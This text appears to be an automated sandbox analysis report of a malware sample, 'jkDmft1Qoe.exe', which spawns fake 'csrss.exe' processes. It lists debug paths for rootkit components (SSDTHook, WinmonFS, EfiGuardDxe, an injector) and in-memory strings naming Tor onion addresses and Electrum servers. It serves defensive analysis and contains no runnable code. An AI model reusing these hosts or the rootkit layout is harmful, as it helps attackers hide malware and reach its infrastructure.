          Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: Unable to locate the .pdb file in this location source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: The module signature does not match with .pdb signature. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: .pdb.dbg source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: '(EfiGuardDxe.pdbx source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000020.00000002.722682252.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: symsrv.pdbGCTL source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.676233642.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000011.00000002.701096602.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000016.00000002.702361556.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.697442468.0000000000C57000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.707266801.0000000000C57000.00000008.00020000.sdmp
          Source: Binary string: or you do not have access permission to the .pdb location. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: EfiGuardDxe.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000020.00000002.722682252.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: dbghelp.pdb source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp
          Source: Binary string: dbghelp.pdbGCTL source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,35_2_00007FF6148A5C10

          Networking:

          barindex
          Found Tor onion addressShow sources
          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
          Source: jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
          Source: csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
          Source: csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
          Source: csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
